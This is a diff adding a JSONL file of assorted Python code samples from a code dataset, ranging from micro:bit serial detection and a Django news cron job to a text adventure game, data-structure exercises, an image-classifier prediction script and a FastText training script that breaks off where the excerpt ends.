diff --git "a/5987.jsonl" "b/5987.jsonl" new file mode 100644--- /dev/null +++ "b/5987.jsonl" @@ -0,0 +1,762 @@ +{"seq_id":"47279300","text":"import serial\n\nconn = serial.Serial()\nconn.baudrate = 115200\nconn.timeout = .5\n\ndef get_microbit():\n for x in range(1, 10):\n try:\n conn.port = \"COM\" + str(x)\n conn.open()\n conn.write(\"\\n\".encode(\"utf-8\"))\n new = conn.read_until(b\"microbitfound \\r\\n\")\n try:\n if new.decode().startswith(\"microbitfound\"):\n conn.close()\n return \"COM\" + str(x)\n except UnicodeDecodeError:\n continue\n except serial.SerialException as e:\n continue\n return False","sub_path":"src/microbit.py","file_name":"microbit.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"25537331","text":"from django.core.cache import cache\r\nimport os, requests, json\r\n\r\n\r\n\r\ndef my_scheduled_job():\r\n pass\r\n\r\ndef get_real_news_articles():\r\n news_articles_response = requests.get(f'https://newsapi.org/v2/top-headlines?country=us&apiKey={os.getenv(\"NEWS_API_KEY\")}')\r\n # check if request failed\r\n if news_articles_response.status_code != 200:\r\n raise Exception(\"Failed making API request.\")\r\n news_articles = news_articles_response.json()\r\n articles = news_articles[\"articles\"]\r\n for article in articles:\r\n cache.set(f'article:{article[\"title\"]}', article, timeout=3600)\r\n print(article)\r\n\r\ndef get_fake_news_data():\r\n test_queries = ['bacon', 'snake', 'slug', 'pizza', 'candy']\r\n request_key = {'Api-Key': os.getenv(\"IMAGE_API_KEY\")}\r\n\r\n for query in test_queries:\r\n\r\n request_url = f'https://api.deepai.org/api/text2img?text={query}'\r\n fake_images_response = requests.post(request_url, headers=request_key)\r\n # check if request failed\r\n if fake_images_response.status_code != 200:\r\n raise Exception(\"Failed making API request for image.\")\r\n fake_image = fake_images_response.json()\r\n # articles = news_articles[\"articles\"]\r\n # for article in articles:\r\n cache.set(f'fake_image:{fake_image[\"id\"]}', fake_image, timeout=3600)\r\n print(fake_image)\r\n\r\n # get a fake title\r\n fake_title_response = requests.get(\"https://clickbait-generator.herokuapp.com/api\")\r\n # check if request failed\r\n if fake_title_response.status_code != 200:\r\n raise Exception(\"Failed making API request for title.\")\r\n fake_title = fake_title_response.json()\r\n cache.set(f'fake_title:{fake_title[\"title\"]}', fake_title, timeout=3600)\r\n print(fake_title)\r\n\r\n\r\n ","sub_path":"news/cron.py","file_name":"cron.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"403361759","text":"\"\"\" Wzorzec klasy:\r\nfig = [ 'typ_figury', #pole typfig\r\n [x, y], #srodek okregu, lewy-gorny rog kwadratu\r\n t #dlugosc boku/ promien\r\n ]\r\n\"\"\"\r\n\r\ndef Figura(typfig, x, y, t=0): #konstruktor\r\n if typfig not in [\"point\", \"circle\", \"square\"]:\r\n print(\"Unexpected figure, try 'point', 'circle' or 'square'.\")\r\n return None\r\n print(\"Object \\'\"+ typfig+ \"\\' has been created, x = \", x, \", y =\", y)\r\n if typfig == \"point\":\r\n return [ typfig, [x, y] ]\r\n else:\r\n return [ typfig, [x, y], t ]\r\n\r\ndef narysuj(Figura):\r\n if Figura[0] == 'point':\r\n print(Figura[0], \"has been printed.\\n(x, y) = (%.4f, %.4f)\" % (Figura[1][0], Figura[1][1]) )\r\n elif Figura[0] == 'square':\r\n print(Figura[0], \"with arm length =\", 
Figura[2], \"has been printed.\")\r\n elif Figura[0] == 'circle':\r\n print(Figura[0], \"with radius =\",Figura[2], \"and center at (x, y) =\",Figura[1], \"has been printed.\")\r\n else:\r\n print(\"Error\")\r\n \r\ndef przesun(Figura, x, y):\r\n old = (float(Figura[1][0]), float(Figura[1][1]))\r\n new = (float(Figura[1][0] + x), float(Figura[1][1] + y))\r\n Figura[1][0] += float(x)\r\n Figura[1][1] += float(y)\r\n print(\"Move from [%.4f, %.4f] to [%.4f, .%4f]\" % ( old[0], old[1], new[0], new[1]) )\r\n \r\ndef zawiera(Figura, x, y):\r\n typfig = Figura[0]\r\n X, Y = Figura[1]\r\n if typfig == 'square':\r\n t = Figura[2]\r\n if ( x >= X and x <= (X+t) ) and ( y >= Y and y <= (Y+t) ):\r\n return 1\r\n return -1\r\n elif typfig == 'circle':\r\n r = Figura[2] **2\r\n R = (X-x)**2 + (Y-y)**2\r\n if R <= r:\r\n return 1\r\n return -1\r\n elif typfig == 'point':\r\n if x == X and y == Y:\r\n return 1\r\n return -1\r\n\r\n\r\n","sub_path":"Lista1/Figura.py","file_name":"Figura.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"57755213","text":"import pickle\nimport os\n#Attributes in dat files\n# 'author'\n#'burk_count', 'pant_count', 'fin_count', 'interp_count', 'pact_count', 'adja_count', 'ppron12_count', 'adj_count', 'impt_count', 'praet_count', 'imps_count', 'comp_count', 'ppas_count', 'prep_count', 'depr_count', 'inf_count', 'ppron3_count', 'ger_count', 'aglt_count', 'pred_count', 'adv_count', 'conj_count', 'winien_count', 'siebie_count', 'adjp_count', 'noun_count', 'pcon_count', 'brev_count', 'qub_count', 'bedzie_count', 'num_count', 'interj_count', 'adjc_count', 'subst_count', 'verb_count', 'numcol_count'\nf = open(\"tytuly.txt\")\npath = 'datFilesNew/'\nfor fileName in os.listdir(path):\n\ttry:\n\t\tfilePath = 'datFilesNew/' + fileName\n\t\t#filePath = 'datFilesNew/do-franciszka-szemiotha.dat'\n\t\tfile = open(filePath,'rb')\n\t\tprint(filePath)\n\t\tdata = pickle.load( file )\n\t\tprint ('noun: ', data['noun_count'],' in file: ',fileName, ' author: ', data['author'])\n\texcept IOError:\n\t\tprint('Error in file: ',fileName)\n\n","sub_path":"data/readDat.py","file_name":"readDat.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"362968085","text":"\"\"\"\n Loading and running every scenario\n\"\"\"\n\n# local imports\nfrom .game_io import prompt_in, send_out\nfrom .player import Player\n\n\ndef scenario(player, scenario_id):\n \"\"\" Loads into the scenario \"\"\"\n print(\"From scenario \" + str(player.id))\n if scenario_id == \"start\":\n send_out(\n \"You are in a white, bare room with nothing but a mirror with a few words on it.\"\n + \"Upon further inspection the mirror seems to be asking you a question, “Who are you?”\",\n player.id,\n )\n return (player, \"intro\")\n if scenario_id == \"intro\":\n send_out(\n \"You wake up at your desk in class, with no one in sight. 
Strangely enough, \"\n + \"it looks like everyone has left only recently and forgotten their things.\",\n player.id,\n )\n action = prompt_in()\n looted = False\n while action:\n if parse(action)[\"loot\"]:\n if not looted:\n send_out(\"You find $20 in people's bags.\", player.id)\n player.money += 20\n looted = True\n else:\n send_out(\"You've already looted everything!\", player.id)\n if parse(action)[\"look\"]:\n send_out(\"It seems dark outside...\", player.id)\n if parse(action)[\"leave\"]:\n send_out(\"You leave the room.\", player.id)\n return (player, \"intro_hall\")\n action = prompt_in()\n if scenario_id == \"intro_hall\":\n send_out(\n \"As you leave the room, you notice that the hallway is empty as well,\"\n + \"with some strange gray trails all heading either towards or from the main entrance.\",\n player.id,\n )\n send_out(\"Where do you go?\", player.id)\n action = prompt_in()\n next_area = None\n while not next_area:\n if \"classroom\" in action or \"away\" in action:\n next_area = \"classroom\"\n break\n if \"entrance\" in action or \"towards\" in action:\n next_area = \"entrance\"\n break\n action = prompt_in()\n send_out(\n \"As you approach, there is a slow and constant squishing sound,\"\n + \"like the noises of an oversaturated bath towel.\",\n player.id,\n )\n return (player, next_area)\n if scenario_id == \"classroom\":\n send_out(\n \"Peeking in, you find a strange gray mass that rests on top of the trail. The stra\"\n + \"nger thing is that the room itself seems to lack color wherever this mass goes.\",\n player.id,\n )\n action = prompt_in()\n slime_alive = True\n while action:\n if parse(action)[\"fight\"] and slime_alive:\n send_out(\"You begin combat with the gray slime!\", player.id)\n slime_npc = Player(\"\", 10, 10, 10, 0, 0, 0)\n combat(player, slime_npc)\n slime_alive = False\n if parse(action)[\"leave\"]:\n return (player, \"entrance\")\n if scenario_id == \"entrance\":\n send_out(\n \"Outside of the schoool, you find a few of your classmates and your professor, trying \"\n + \"to fend off some colorless slimes with brooms.\",\n player.id,\n )\n action = prompt_in()\n slime_alive = True\n looted = False\n while action:\n if parse(action)[\"fight\"]:\n send_out(\"You begin combat with the gray slimes!\", player.id)\n slime_npc1 = Player(\"\", 10, 10, 10, 0, 0, 0)\n combat(player, slime_npc1)\n slime_npc2 = Player(\"\", 10, 10, 10, 0, 0, 0)\n combat(player, slime_npc2)\n slime_npc3 = Player(\"\", 10, 10, 10, 0, 0, 0)\n combat(player, slime_npc3)\n slime_alive = False\n if parse(action)[\"talk\"]:\n send_out(\n \"You walk over and see your classmates wearily pushing the slimes away.\"\n + ' \"Oh, you\\'re alive!\", goes your professor. 
\"Come lend us a hand!\"',\n player.id,\n )\n if parse(action)[\"loot\"] and not looted:\n send_out(\"You find a broom!\", player.id)\n if parse(action)[\"quit\"]:\n return (player, \"end\")\n\n return (player, scenario_id, player.id)\n\n\ndef parse(command):\n \"\"\"\n function that parses a string and returns a map of strings->booleans based on command\n - command is a string\n \"\"\"\n d = {}\n\n # exploration\n d[\"fight\"] = \"fight\" in command or \"attack\" in command\n d[\"leave\"] = \"leave\" in command\n d[\"look\"] = \"look\" in command\n d[\"loot\"] = \"loot\" in command or \"steal\" in command\n d[\"talk\"] = \"talk\" in command\n # fighting\n d[\"attack\"] = \"attack\" in command\n d[\"melee\"] = \"melee\" in command\n d[\"range\"] = \"range\" in command\n d[\"magic\"] = \"magic\" in command\n # exit game\n d[\"quit\"] = \"quit\" in command\n\n return d\n\n\n# COMBAT COMBAT COMBAT\ndef combat(player, enemy):\n \"\"\" Simulates combat between the player and the enemy \"\"\"\n send_out(\"Player \" + player.id + \" begins combat with \" + enemy.id, player.id)\n send_out(\n \"Player \"\n + player.id\n + \" starts at \"\n + str(player.health)\n + \"/\"\n + str(player.max_health),\n player.id,\n )\n send_out(\n \"Player \"\n + enemy.id\n + \" starts at \"\n + str(enemy.health)\n + \"/\"\n + str(enemy.max_health),\n player.id,\n )\n while not player.is_dead() and not enemy.is_dead():\n # Prompt player aciton\n action = prompt_in()\n # Determine faster speed, Pokemon style\n if enemy.speed > player.speed:\n # Enemies go first\n send_out(enemy.attack(\"melee\", player), player.id)\n if parse(action)[\"attack\"]:\n send_out(player.attack(\"melee\", enemy), player.id)\n else:\n continue # we don't handle other actions right now\n else:\n # players go first\n if parse(action)[\"attack\"]:\n send_out(player.attack(\"melee\", enemy), player.id)\n send_out(enemy.attack(\"melee\", player), player.id)\n else:\n continue # we don't handle other actions right now\n winner = player.id\n if player.is_dead():\n winner = enemy.id\n send_out(\"Combat has ended! 
\" + winner + \" has won!\", player.id)\n","sub_path":"game/scenario.py","file_name":"scenario.py","file_ext":"py","file_size_in_byte":6571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"32714642","text":"class slink:\n def __init__(self, num, _next=None):\n self.num = num\n self.next = _next\n\n def insert(self, k):\n self.next = k\n\n def delete(self, _front, _next):\n _front.next = _next\n\n def printl(self):\n print(self.num, end=\" \")\n if self.next is not None:\n return self.next.printl()\n\n\nl = [slink(i) for i in range(10)]\nfor i in range(0, 9):\n l[i].next = l[i + 1]\nl[0].printl()\na = slink(10, l[6])\nl[5].insert(a)\nprint()\nl[0].printl()\nprint()\na.delete(l[5], l[6])\nl[0].printl()\n","sub_path":"Python/单向链表.py","file_name":"单向链表.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"198896427","text":"t=int(input())\nfor i in range(t):\n n=input()\n sum=int(n)\n while sum>9:\n sum=0\n for j in range(0,len(n)):\n sum+=int(n[j])\n n=str(sum)\n print(sum) ","sub_path":"Code/CodeRecords/2723/60618/263243.py","file_name":"263243.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"210276677","text":"def month_name(num, lang):\n rus = {0: \"январь\",\n 1: \"февраль\",\n 2: \"март\",\n 3: \"апрель\",\n 4: \"май\",\n 5: \"июнь\",\n 6: \"июль\",\n 7: \"август\",\n 8: \"сентябрь\",\n 9: \"октябрь\",\n 10: \"ноябрь\",\n 11: \"декабрь\"}\n \n eng = {0: \"january\",\n 1: \"February\",\n 2: \"March\",\n 3: \"April\",\n 4: \"May\",\n 5: \"June\",\n 6: \"July\",\n 7: \"August\",\n 8: \"september\",\n 9: \"october \",\n 10: \"november\",\n 11: \"december\"}\n \n if lang == \"ru\":\n return rus[num - 1]\n return eng[num - 1].lower()\n","sub_path":"Lesson 20 (Функции. Возвращение значений из функций)/Homework/1. Месяц Month.py","file_name":"1. 
Месяц Month.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"619552483","text":"class Node:\r\n def __init__(self,data):\r\n self.data=data\r\n self.left=None\r\n self.right=None\r\n\r\nclass BinarySearchTree:\r\n def __init__(self):\r\n self.root=None\r\n\r\n def insert(self,data):\r\n n=Node(data)\r\n if self.root is None:\r\n self.root=n\r\n else:\r\n curr=self.root\r\n while True:\r\n if datacurr.data:\r\n if curr.right is None:\r\n curr.right=n\r\n break\r\n else:\r\n curr=curr.right\r\n else:\r\n break\r\n\r\nm=0\r\ndef inorder(root):\r\n global m\r\n if root is None:\r\n return m\r\n inorder(root.left)\r\n m=root.data\r\n return inorder(root.right)\r\n\r\ndef levelorder(root):\r\n m=0\r\n q=[]\r\n q.append(root)\r\n while len(q)>0:\r\n x=q.pop(0)\r\n if x.data>m:\r\n m=x.data\r\n if x.left is not None:\r\n q.append(x.left)\r\n if x.right is not None:\r\n q.append(x.right)\r\n return m\r\n\r\n\r\ndef max_node(root):\r\n #m=inorder(root)\r\n m=levelorder(root)\r\n return m\r\n\r\n\r\nob=BinarySearchTree()\r\nl=list(map(int,input().split()))\r\nfor i in l:\r\n ob.insert(i)\r\n\r\nm=max_node(ob.root)\r\nprint('Maximum value node:',m)\r\n","sub_path":"Trees/max_val_node.py","file_name":"max_val_node.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"169889152","text":"import save_load_model\nimport json\nimport torch\nfrom random import randint \nimport process_image as pima\nimport train\nimport argparse\nimport view_classify\nimport signal\n\nfrom contextlib import contextmanager\n\nimport requests\n\ndef get_input_args():\n if __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--topk', type = int, default = 5, help = 'Number of top classes to be returned') \n in_args = parser.parse_args()\n in_args_dict = vars(in_args)\n #predict_in_args_list = [v for v in in_args_dict.values()]\n print(in_args_dict)\n return in_args_dict\n # stuff only to run when not called via 'import' here\n else:\n in_args_dict = {'topk': 5}\n return(in_args_dict)\n\nDELAY = INTERVAL = 4 * 60 # interval time in seconds\nMIN_DELAY = MIN_INTERVAL = 2 * 60\nKEEPALIVE_URL = \"https://nebula.udacity.com/api/v1/remote/keep-alive\"\nTOKEN_URL = \"http://metadata.google.internal/computeMetadata/v1/instance/attributes/keep_alive_token\"\nTOKEN_HEADERS = {\"Metadata-Flavor\":\"Google\"}\n\n\ndef _request_handler(headers):\n def _handler(signum, frame):\n requests.request(\"POST\", KEEPALIVE_URL, headers=headers)\n return _handler\n\n\n@contextmanager\ndef active_session(delay=DELAY, interval=INTERVAL):\n \"\"\"\n Example:\n\n from workspace_utils import active session\n\n with active_session():\n # do long-running work here\n \"\"\"\n token = requests.request(\"GET\", TOKEN_URL, headers=TOKEN_HEADERS).text\n headers = {'Authorization': \"STAR \" + token}\n delay = max(delay, MIN_DELAY)\n interval = max(interval, MIN_INTERVAL)\n original_handler = signal.getsignal(signal.SIGALRM)\n try:\n signal.signal(signal.SIGALRM, _request_handler(headers))\n signal.setitimer(signal.ITIMER_REAL, delay, interval)\n yield\n finally:\n signal.signal(signal.SIGALRM, original_handler)\n signal.setitimer(signal.ITIMER_REAL, 0)\n\n\ndef keep_awake(iterable, delay=DELAY, interval=INTERVAL):\n \"\"\"\n Example:\n\n from workspace_utils import keep_awake\n\n for i in keep_awake(range(5)):\n # do iteration with lots of 
work here\n \"\"\"\n with active_session(delay, interval): yield from iterable\n\n\ndef predict(image_path, model, args, args_predict, topk=5):\n #print (\"entering predict function...\") \n img_tensor = pima.process_image(image_path)\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() and args[6] == True else \"cpu\")\n #print(f\"device = {device}\")\n model.to(device)\n img_tensor = img_tensor.to(device)\n img_tensor = img_tensor.unsqueeze_(0)\n log_ps = model(img_tensor)\n ps = torch.exp(log_ps)\n ps_topk = ps.topk(topk)\n \n probs_and_classes = [ps_topk]\n print (\"outcome from predict.predict = \", probs_and_classes)\n return probs_and_classes\n\n\ndef define_image_path_for_inference():\n image_paths_100 = [\"aipnd-project_original udacity folder/flowers/test/100/image_07896.jpg\", \n \"aipnd-project_original udacity folder/flowers/test/100/image_07897.jpg\", \n \"aipnd-project_original udacity folder/flowers/test/100/image_07899.jpg\",\n \"aipnd-project_original udacity folder/flowers/test/100/image_07902.jpg\",\n \"aipnd-project_original udacity folder/flowers/test/100/image_07926.jpg\",\n \"aipnd-project_original udacity folder/flowers/test/100/image_07936.jpg\",\n \"aipnd-project_original udacity folder/flowers/test/100/image_07938.jpg\",\n \"aipnd-project_original udacity folder/flowers/test/100/image_07939.jpg\"]\n \n image_paths_13 = [\"aipnd-project_original udacity folder/flowers/test/13/image_05745.jpg\", \n \"aipnd-project_original udacity folder/flowers/test/13/image_05761.jpg\", \n \"aipnd-project_original udacity folder/flowers/test/13/image_05767.jpg\",\n \"aipnd-project_original udacity folder/flowers/test/13/image_05769.jpg\",\n \"aipnd-project_original udacity folder/flowers/test/13/image_05775.jpg\",\n \"aipnd-project_original udacity folder/flowers/test/13/image_05787.jpg\"]\n \n image_path_index = randint(0,len(image_paths_100)-1)\n image_path = image_paths_100[image_path_index]\n print(\"image path = \", image_path)\n return image_path\n\ndef prepare_and_run_prediction(image_path):\n args_train = train.get_input_args()\n args_predict = get_input_args()\n #model = import_the_checkpoint_ver2.load_checkpoint_and_rebuild_the_model(args)\n model = save_load_model.load_checkpoint_and_rebuild_the_model(args_train)\n with torch.no_grad():\n model.eval()\n #image_path = define_image_path_for_inference()\n probs_and_classes = predict(image_path, model, args_train, args_predict)\n #print(\"started topklabels \")\n topk_labels, numpy_probs = view_classify.get_topk_labels(args_predict, probs_and_classes, False)\n print(\"completed topklabels\", topk_labels)\n return probs_and_classes, topk_labels, numpy_probs\n \n \nif __name__ == \"__main__\":\n # stuff only to run when not called via 'import' here\n image_path = define_image_path_for_inference()\n prepare_and_run_prediction(image_path)\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":5240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"483621040","text":"# -*- coding: UTF-8 -*-\n\nimport cv2\nimport numpy as np\n\n\ndef histogram(image, t, w, h):\n mhist = []\n\n # 세로 -> 가로 히스토그램\n if (t == 0):\n # 90도 회전 - 가로, 세로 사이즈 반전 일어남\n img = np.rot90(image)\n\n # 현재 img의 세로 size (for문 돌리기 위함)\n size = np.size(img, 0)\n # mhist = np.zeros((size, 1), dtype=\"uint8\")\n\n\n # 가로: 원본 이미지 -> 세로 히스토그램\n else:\n img = image\n size = np.size(img, 0)\n # mhist = np.zeros((size, 1), dtype=\"uint8\")\n\n # count nonzero value\n max = 
-100\n for j in range(size):\n v = cv2.countNonZero(img[j])\n # mhist[j] = v\n mhist.append(v)\n if (v > max):\n max = v\n\n # 원본 이미지의 경우: 세로 히스토그램 생성\n if (t == 1):\n width = max\n height = h\n histo = np.zeros((height, width, 1), dtype=\"uint8\")\n\n for i in range(height):\n data = mhist[i]\n for j in range(width):\n if (data == 0):\n break\n else:\n histo[i][j] = 255\n data -= 1\n\n # 90도 회전 이미지의 경우: 가로 히스토그램 생성\n else:\n width = w\n height = max\n hist = np.zeros((height, width, 1), dtype=\"uint8\")\n\n for j in range(width):\n data = mhist[j]\n for i in range(height - 1, -1, -1):\n if (data == 0):\n break\n else:\n hist[i][j] = 255\n data -= 1\n\n histo = cv2.flip(hist, 1)\n mhist.reverse()\n\n return histo, mhist\n","sub_path":"Histogram2.py","file_name":"Histogram2.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"243085757","text":"def same_digits(n, m):\n\tif sorted(str(n)) == sorted(str(m)):\n\t\treturn True\n\telse:\n\t\treturn False\n\ncondition = True\nn = 0\nwhile condition:\n\tn += 1\n\tfor i in range(2, 7):\n\t\tif not same_digits(n, n*i):\n\t\t\tbreak\n\t\tif i == 6:\n\t\t\tcondition = False\n\nprint(n)","sub_path":"52-permuted_multiples.py","file_name":"52-permuted_multiples.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"307459748","text":"unigram_file = open('code_unigram_stops', 'r', encoding='utf-8')\nbigram_file = open('code_bigram_stops', 'r', encoding='utf-8')\ntrigram_file = open('code_trigram_stops', 'r', encoding='utf-8')\npreprocessed_file = open('code_mid_preprocessed1', 'r', encoding='utf-8')\nfinal_file = open('code_preprocessed', 'w', encoding='utf-8')\n\nunigrams = unigram_file.readlines()\nbigrams = bigram_file.readlines()\ntrigrams = trigram_file.readlines()\nfor i in range(len(unigrams)):\n unigrams[i] = unigrams[i].strip('\\n')\nfor i in range(len(bigrams)):\n bigrams[i] = bigrams[i].strip('\\n')\nfor i in range(len(trigrams)):\n trigrams[i] = trigrams[i].strip('\\n')\nfor line in preprocessed_file:\n tokens = line.strip('\\n').split(',')\n i = 0\n while i < len(tokens) - 1:\n bi = tokens[i] + ' ' + tokens[i + 1]\n found = False\n for b in bigrams:\n if bi == b:\n tokens.pop(i)\n tokens.pop(i)\n found = True\n if not found:\n i += 1\n i = 0\n while i < len(tokens):\n uni = tokens[i]\n found = False\n for u in unigrams:\n if uni == u:\n tokens.pop(i)\n found = True\n if not found:\n i += 1\n result = ','.join(tokens)+'\\n'\n final_file.write(result)\n\nfinal_file.close()\npreprocessed_file.close()\ntrigram_file.close()\nbigram_file.close()\nunigram_file.close()\n","sub_path":"code_stop_elimate.py","file_name":"code_stop_elimate.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"471671937","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport ckeditor.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('portfolio', '0008_auto_20170524_2329'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='project',\n options={'ordering': ('my_order',)},\n ),\n migrations.AddField(\n model_name='project',\n name='my_order',\n field=models.PositiveIntegerField(default=0),\n ),\n migrations.AlterField(\n model_name='photo',\n name='caption',\n 
field=ckeditor.fields.RichTextField(blank=True, null=True),\n ),\n migrations.AlterField(\n model_name='project',\n name='description',\n field=ckeditor.fields.RichTextField(blank=True, help_text='Project description'),\n ),\n ]\n","sub_path":"portfolio/migrations/0009_auto_20170529_1901.py","file_name":"0009_auto_20170529_1901.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"48194816","text":"import tkinter as tk\n\nfrom theme import *\n\nbtn_cnf = {\n \"bg\": DARK,\n \"fg\": FG,\n \"relief\": tk.FLAT,\n \"font\": (\"Roboto\", 13),\n \"cursor\": \"hand2\",\n \"activebackground\": DARK,\n \"activeforeground\": PRIM,\n \"bd\": 0,\n}\nbtn_nav_cnf = {\n **btn_cnf,\n \"font\": (\"Roboto\", 14, \"bold\"),\n 'width': 14\n}\nbtn_head_cnf = {\"width\": 2, \"font\": (\"Roboto\", 14), \"bg\": DARK}\nbtn_normal_cnf_cfg = {\"fg\": FG, \"bg\": DARK}\nbtn_hover_cnf_cfg = {\"fg\": PRIM}\nbtn_normal_from_hover_cnf_cfg = {\"fg\": btn_normal_cnf_cfg[\"fg\"]}\nbtn_active_cnf_cfg = {\n \"bg\": PRIM,\n \"fg\": DARK,\n}\nlb_cnf = {\"bg\": DARK, \"fg\": FG, \"font\": (\"Roboto\", 11)}\nseclb_cnf = {\"bg\": DARK, \"fg\": PRIM, \"font\": (\"Roboto\", 8)}\nbiglb_cnf = {**lb_cnf, 'fg': PRIM, 'font': ('Segoe UI', 24)}\nhlb_cnf = {\"bg\": DARK, \"fg\": PRIM, \"font\": (\"Roboto\", 11, \"bold\"), 'anchor': 'w'}\nwrnlb_cnf = {\n \"bg\": DARK,\n \"fg\": \"red\",\n \"font\": (\"Roboto Light\", 9, \"bold\"),\n \"wraplength\": 290\n}\nfrm_cnf = {\"bg\": DARK, \"padx\": 4, \"pady\": 0}\ncont_frm_cnf = {**frm_cnf, **{\"pady\": 4}}\nnav_frm_cnf = {**frm_cnf, **{\"padx\": 0, \"bg\": DARK}}\nlbfrm_cnf = {\n \"bg\": DARK,\n \"padx\": 4,\n \"pady\": 4,\n \"fg\": PRIM,\n \"font\": (\"Roboto\", 11, \"bold\"),\n \"bd\": 0,\n \"highlightbackground\": PRIM,\n \"highlightthickness\": \"1\",\n \"labelanchor\": \"n\"\n}\ncnv_cnf = {\"highlightthickness\": 0, \"highlightbackground\": \"#10131a\"}\nlistbox_cnf = {\n \"bg\": SEC,\n \"font\": (\"Roboto\", 11),\n \"fg\": FG,\n \"relief\": 'flat',\n \"selectbackground\": PRIM,\n \"selectmode\": 'extended',\n \"highlightthickness\": 10,\n \"highlightbackground\": SEC,\n \"highlightcolor\": SEC,\n \"activestyle\": \"none\",\n \"cursor\": \"hand2\"\n}\nscrollbar_cnf = {\"troughcolor\": DARK}\n\nbtn_nav_pck = {\"side\": tk.LEFT, 'ipadx': 10}\nnav_frm_pck = {\"side\": tk.TOP, \"anchor\": \"w\", \"fill\": tk.X, \"expand\": True}\nhead_frm_pck = {\"side\": tk.TOP, \"fill\": tk.X}\ntitle_lb_pck = {\"side\": tk.LEFT, \"fill\": 'both', 'ipadx': 10, 'ipady': 5, 'expand': True}\nbtn_head_pck = {\"side\": tk.RIGHT, \"fill\": tk.Y}\ncnv_pck = {\"side\": tk.TOP}\n","sub_path":"style.py","file_name":"style.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"593626154","text":"#!/usr/bin/env python3\n\nimport pandas as pd\n\ndf = pd.read_csv('/Users/lpottier/research/projects/active/decaf-work/cori-runs-log/pegasus-io-1000genome.csv')\n\ndf['Size(B)'] = df['Size(B)']/(1024*1024)\ndf['MAXRSS(KB)'] = df['MAXRSS(KB)']/(1024*1024)\ndf = df.rename(columns={\"Size(B)\": \"Size(MB)\", \"MAXRSS(KB)\": \"MAXRSS(GB)\"})\n\ndf = df.groupby(['K','Trial']).max()\ndf = df.groupby('K').agg(['mean', 'std'])\n\ndf[('Size(MB)', 'mean')] = df[('Size(MB)', 'mean')].round(2)\ndf[('MAXRSS(GB)', 'mean')] = df[('MAXRSS(GB)', 'mean')].round(2)\n\npd.set_option('display.float_format', lambda x: format(x, 
\"5.2e\"))\nprint(df.to_latex(index=True))\nprint(df.to_markdown(index=True))\n","sub_path":"analysis/analyze-io.py","file_name":"analyze-io.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"601749421","text":"# Copyright 2022 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"FastText for train\"\"\"\nimport os\nimport time\nimport numpy as np\nfrom mindspore import context\nimport mindspore.nn as nn\nimport mindspore.ops.operations as P\nfrom mindspore.nn.optim import Adam\nfrom mindspore.common import set_seed\nfrom mindspore.train.model import Model\nimport mindspore.common.dtype as mstype\nfrom mindspore.common.tensor import Tensor\nfrom mindspore.context import ParallelMode\nfrom mindspore.train.callback import Callback, TimeMonitor\nfrom mindspore.communication import management as MultiDevice\nfrom mindspore.train.callback import CheckpointConfig, ModelCheckpoint\nfrom mindspore.train.serialization import load_checkpoint, export, load_param_into_net\n\nfrom src.load_dataset import load_dataset\nfrom src.lr_schedule import polynomial_decay_scheduler\nfrom src.fasttext_train import FastTextTrainOneStepCell, FastTextNetWithLoss\nfrom src.fasttext_model import FastText\n\nfrom model_utils.config import config\nfrom model_utils.moxing_adapter import moxing_wrapper\nfrom model_utils.device_adapter import get_device_id, get_device_num\n\n\ndef get_ms_timestamp():\n t = time.time()\n return int(round(t * 1000))\n\nset_seed(5)\ntime_stamp_init = False\ntime_stamp_first = 0\ncontext.set_context(mode=context.GRAPH_MODE, save_graphs=False, device_target=config.device_target)\n\nif config.data_name == \"ag\":\n target_label1 = ['0', '1', '2', 